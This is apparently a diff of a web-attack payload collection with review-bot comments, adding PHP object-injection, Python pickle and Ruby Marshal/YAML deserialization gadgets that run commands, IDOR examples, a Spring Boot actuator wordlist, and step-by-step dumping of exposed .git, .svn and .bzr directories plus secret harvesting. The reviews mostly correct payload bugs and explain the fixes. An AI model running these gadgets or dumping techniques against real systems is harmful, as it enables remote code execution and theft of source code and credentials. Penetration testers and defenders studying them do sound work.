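Review bot: the new magic-method list is the right addition for this page, but "`__destruct()` when an object is deleted" undersells the point that makes a bare `unserialize()` call exploitable: the destructor runs when the last reference to the injected object goes away or at script shutdown, so it fires even if the application never calls a method on the object. Suggest "`__destruct()` when an object is destroyed (last reference dropped or script end), which happens automatically for an injected object", and "help you for a PHP Object injection" → "are the usual entry points for PHP Object Injection". The `__wakeup()` line is accurate: it runs inside `unserialize()` itself.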
@@ -40,7 +46,6 @@ a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
# Command execution # Command execution
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
``` ```
## Authentication bypass ## Authentication bypass
@@ -62,11 +67,11 @@ if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
Payload: Payload:
``` ```php
a:2:{s:8:"username";b:1;s:8:"password";b:1;} a:2:{s:8:"username";b:1;s:8:"password";b:1;}
``` ```
Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) Because `true == "str"` is true.
### Object reference ### Object reference
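Review bot: "Because `true == "str"` is true." is only half the explanation: the payload `a:2:{s:8:"username";b:1;s:8:"password";b:1;}` works because the check in the hunk header uses loose comparison (`$data['username'] == $adminName`), and PHP's `==` coerces the non-empty string to boolean `true` before comparing. It would help readers to state that the bypass fails against strict comparison (`===`), which is the fix. Moving the POC2009 reference to `## References` is fine, but the sentence now ends without any pointer; keep a short "(see POC2009 Shocking News in PHP Exploitation under References)".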
@@ -93,14 +98,9 @@ if($obj) {
Payload: Payload:
```php
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
```
Ref:
- [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
- [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
## Others exploits ## Others exploits
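Review bot: the replacement payload `O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}` is malformed: `guess` is five bytes, so it must be declared `s:5:"guess"`; with `s:4` PHP's `unserialize()` returns `false` and the reference trick (`R:2;` pointing `guess` at `secretCode`) never happens. The removed line used `s:4:"code"`, which was internally consistent, so the rename introduced the bug; please fix the length and re-test against the `if($obj)` check in the hunk header.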
@@ -146,9 +146,20 @@ echo urlencode(serialize(new PHPObjectInjection));
phpggc monolog/rce1 'phpinfo();' -s phpggc monolog/rce1 'phpinfo();' -s
``` ```
## Thanks to ## Real world examples
- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) * [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212)
- [PHP unserialize](http://php.net/manual/en/function.unserialize.php) * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
## References
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
* [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
* [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)

View File

@@ -0,0 +1,50 @@
# Python Deserialization
## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
```python
import cPickle
from base64 import b64encode, b64decode
class User:
def __init__(self):
self.username = "anonymous"
self.password = "anonymous"
self.rank = "guest"
h = User()
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}").format(auth_token)
```
The vulnerability is introduced when a token is loaded from an user input.
```python
new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)
```
Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python
import cPickle
from base64 import b64encode, b64decode
class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))
e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)
```
## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
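Review bot: the malicious-token snippet calls `os.system` in `Evil.__reduce__` but never imports `os`, so `cPickle.dumps(e)` raises `NameError` before any token is produced; add `import os` to that block. Both snippets are Python 2 only (`cPickle`, `raw_input`, the `print` statement); the file should say so, or show the Python 3 equivalent (`import pickle`, `input()`), since the same `__reduce__` gadget works unchanged there. Nit: "Let's create a malicious data" → "Let's create malicious data".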

View File

@@ -7,8 +7,9 @@ Check the following sub-sections, located in other files :
* [Java deserialization : ysoserial, ...](Java.md) * [Java deserialization : ysoserial, ...](Java.md)
* [PHP (Object injection) : phpggc, ...](PHP.md) * [PHP (Object injection) : phpggc, ...](PHP.md)
* [Ruby : universal rce gadget, ...](Ruby.md) * [Ruby : universal rce gadget, ...](Ruby.md)
* [Python : pickle, ...](Python.md)
## Thanks to ## References
* [Github - ysoserial](https://github.com/frohoff/ysoserial) * [Github - ysoserial](https://github.com/frohoff/ysoserial)
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
@@ -20,3 +21,7 @@ Check the following sub-sections, located in other files :
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
* [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
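Review bot: the third added reference has a stray opening parenthesis in its link text, "[(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com]"; drop the "(". The four new entries also mix two author styles in one list ("by Michael Stepankin" after the link versus "- elttam, Luke Jahnke" inside the link text on the line above); pick the "Title - Author" form used elsewhere in these READMEs.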

View File

@@ -1,12 +1,37 @@
# Ruby Deserialization # Ruby Deserialization
## Marshal.load
Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
```ruby ```ruby
for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
``` ```
## Thanks ## Yaml.load
Vulnerable code
```ruby
require "yaml"
YAML.load(File.read("p.yml"))
```
Exploitation code
```ruby
--- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::DependencyList
specs:
- !ruby/object:Gem::Source::SpecificFile
spec: &1 !ruby/object:Gem::StubSpecification
loaded_from: "|id 1>&2"
- !ruby/object:Gem::Source::SpecificFile
spec:
```
## References
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
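Review bot: the "Exploitation code" block under `## Yaml.load` is a YAML document, not Ruby, so its fence should be tagged `yaml` (the docker loop above it is likewise a shell one-liner in a fence tagged `ruby`). The heading should match the constant actually called, `YAML.load`, and the section should say which Ruby versions the YAML gadget covers; the Marshal section states "Ruby 2.0 through to 2.5", the YAML one says nothing. Also worth stating why `YAML.load` is the sink: it instantiates arbitrary `!ruby/object:` classes from the document, whereas `YAML.safe_load` does not, which is the fix.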

Binary file not shown.


View File

@@ -0,0 +1,59 @@
# Insecure Direct Object References
> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Examples](#examples)
* [References](#references)
## Tools
- Burp Suite plugin Authz
- Burp Suite plugin AuthMatrix
- Burp Suite plugin Authorize
## Exploit
![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)
The value of a parameter is used directly to retrieve a database record.
```powershell
http://foo.bar/somepage?invoice=12345
```
The value of a parameter is used directly to perform an operation in the system
```powershell
http://foo.bar/changepassword?user=someuser
```
The value of a parameter is used directly to retrieve a file system resource
```powershell
http://foo.bar/showImage?img=img00011
```
The value of a parameter is used directly to access application functionality
```powershell
http://foo.bar/accessPage?menuitem=12
```
## Examples
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
## References
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
* [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
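Review bot: the image under `## Exploit` has a leftover `lh5.googleusercontent.com/...` URL as its alt text; replace it with a description such as "IDOR: parameter value used directly as an object reference". In `## Tools`, the Burp extension is spelled "Autorize" (Barak Tawily's), not "Authorize"; listed next to "Authz" and "AuthMatrix" the misspelling is easy to miss. The four example URLs are plain HTTP requests inside fences tagged `powershell`; an untagged or `http`-tagged fence would render the same without implying a PowerShell command.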

View File

@@ -0,0 +1,52 @@
auditevents
autoconfig
beans
caches
conditions
configprops
dump
env
flyway
health
heapdump
httptrace
info
integrationgraph
jolokia
logfile
loggers
liquibase
metrics
mappings
prometheus
scheduledtasks
sessions
shutdown
threaddump
trace
actuator/auditevents
actuator/autoconfig
actuator/beans
actuator/caches
actuator/conditions
actuator/configprops
actuator/dump
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/logfile
actuator/loggers
actuator/liquibase
actuator/metrics
actuator/mappings
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/threaddump
actuator/trace

View File

@@ -0,0 +1,19 @@
# Insecure management interface
## Springboot-Actuator
Actuator endpoints let you monitor and interact with your application.
Spring Boot includes a number of built-in endpoints and lets you add your own.
For example, the health endpoint provides basic application health information.
Some of them contains sensitive info such as :
- `/trace` (by default the last 100 HTTP requests with headers)
- `/env` (the current environment properties)
- `/heapdump` (builds and returns a heap dump from the JVM used by our application).
These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
## References
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
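Review bot: "enabled" and "exposed" are different switches in Spring Boot 2.x and the last sentence conflates them: in 2.x most endpoints are enabled but only `/health` and `/info` are exposed over HTTP by default, and everything moves under the `/actuator` prefix; an operator who sets `management.endpoints.web.exposure.include=*` brings `/env`, `/heapdump` and `/httptrace` back, which is the misconfiguration this page is about. Suggest saying that explicitly, and noting that `/trace` became `/httptrace` and `/dump` became `/threaddump` in 2.x so the 1.x names in the bullet list map onto the 2.x ones. Grammar: "Some of them contains sensitive info such as :" → "Some of them contain sensitive information, such as:".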

View File

@@ -0,0 +1,255 @@
# Insecure source code management
- [GIT - Source code management](#git---source-code-management)
- [Github example with a .git](#github-example-with-a-git)
- [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
- [Automatic way : diggit.py](#automatic-way--diggitpy)
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
- [Automatic way : rip-git](#automatic-way--rip-git)
- [Automatic way : GitHack](#automatic-way--githack)
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
- [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob)
- [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks)
- [SVN - Source code management](#svn---source-code-management)
- [SVN example (Wordpress)](#svn-example-wordpress)
- [Automatic way : svn-extractor](#automatic-way--svn-extractor)
- [BAZAAR - Source code management](#bazaar---source-code-management)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
- [Leaked API keys](#leaked-api-keys)
## GIT - Source code management
The following examples will create either a copy of the .git or a copy of the current commit.
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Github example with a .git
1. Check 403 error (Forbidden) for .git or even better : a directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
```powershell
# create a .git directory
git init test
cd test/.git
# download the file
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# display the content of the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
```powershell
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
### Recovering the content of .git/index
Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
```powershell
pip3 install gin
gin ~/git-repo/.git/index
```
Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
```powershell
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
### Automatic way : diggit.py
```powershell
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
-o is a hash of particular Git object to download
```
### Automatic way : GoGitDumper
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
git log
git checkout
```
### Automatic way : rip-git
```powershell
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
### Automatic way : GitHack
```powershell
git clone https://github.com/lijiejie/GitHack
GitHack.py http://www.openssl.org/.git/
```
### Harvesting secrets : trufflehog
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
```
### Harvesting secrets : Gitrob
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
```powershell
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN]
```
### Harvesting secrets - Gitleaks
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
```powershell
# Run gitleaks against a public repository
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
# Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
# Run gitleaks against a specific Github Pull request
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
or
go get -u github.com/zricethezav/gitleaks
```
## SVN - Source code management
### SVN example (Wordpress)
```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2. Download interesting files
* remove \$sha1\$ prefix
* add .svn-base postfix
* use first two signs from hash as folder name inside pristine/ directory (94 in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
### Automatic way : svn-extractor
```powershell
git clone https://github.com/anantshri/svn-extractor.git
python svn-extractor.py url "url with .svn available"
```
## BAZAAR - Source code management
### Automatic way : rip-bzr.pl
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u
```
### Automatic way : bzr_dumper
```powershell
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
Created a standalone tree (format: 2a)
[!] Target : http://127.0.0.1:5000/
[+] Start.
[+] GET repository/pack-names
[+] GET README
[+] GET checkout/dirstate
[+] GET checkout/views
[+] GET branch/branch.conf
[+] GET branch/format
[+] GET branch/last-revision
[+] GET branch/tag
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
[*] Finish
$ bzr revert
N application.py
N database.py
N static/
```
## Leaked API keys
If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
Twilio example :
```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
```
## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
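Review bot: the manual `.git` walk-through in `### Github example with a .git` has path bugs that make the commands fail as written: every `mkdir .git/object/NN` should be `.git/objects/NN` (the directory is `objects`), and step 5 moves the blob into `.git/objects/32/` instead of `.git/objects/cb/`, so `git cat-file -p cb6139...` cannot find it. Also, after `cd test/.git` the relative paths `.git/objects/...` resolve to `test/.git/.git/objects`; either drop the `cd` or use `objects/26` and friends. Two more: the `### Automatic way : rip-bzr.pl` docker line runs `rip-git.pl` and ends with a bare `-u` with no URL, and the TOC anchors `#automatic-way-gogitdumper` and `#harvesting-secrets--gitleaks` do not match the slugs GitHub generates for "Automatic way : GoGitDumper" and "Harvesting secrets - Gitleaks" (the other headings use the " : " form, so make those two consistent).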

View File

@@ -1,108 +0,0 @@
# Insecured source code management
## GIT - Source code management
### Github example with a .git
1. Check 403 error (Forbidden) for .git or even better : directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
```powershell
# create a .git directory
git init test
cd test/.git
# download the file
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# display the content of the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
```powershell
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
### Automatic way : diggit.py
```powershell
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
-o is a hash of particular Git object to download
```
### Alternative way : rip-git
```powershell
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
## SVN - Source code management
### SVN example (Wordpress)
```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2. Download interesting files
* remove \$sha1\$ prefix
* add .svn-base postfix
* use first two signs from hash as folder name inside pristine/ directory (94 in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
### Automatic way
```powershell
git clone https://github.com/anantshri/svn-extractor.git
python svn-extractor.py url "url with .svn available"
```
## Thanks to
* bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks
* bl4de, https://github.com/bl4de/security-tools/tree/master/diggit

View File

@@ -2,16 +2,37 @@
